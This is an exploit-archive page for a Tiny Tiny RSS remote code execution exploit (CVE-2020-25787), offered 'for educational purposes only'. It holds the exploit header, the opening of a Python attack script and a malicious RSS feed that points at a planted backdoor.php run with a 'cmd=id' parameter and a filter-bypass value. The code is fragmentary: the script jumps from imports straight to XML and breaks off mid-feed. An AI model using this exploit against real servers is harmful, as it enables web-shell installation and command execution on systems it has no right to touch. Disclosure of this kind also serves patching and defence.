Exploits / Vulnerability Discovered : 2021-03-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Tiny tiny rss remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Date: 21/09/2020
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787
#!/usr/bin/env python3
from sys import argv
import urllib.parse as ul
import base64
<channel>
<title>Exploit demo - rce</title>
<link></link>
<description>You are getting infected :(</description>
<item>
<title> Check if there is backdoor.php</title>
<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
<description>
<![CDATA[
Dummy text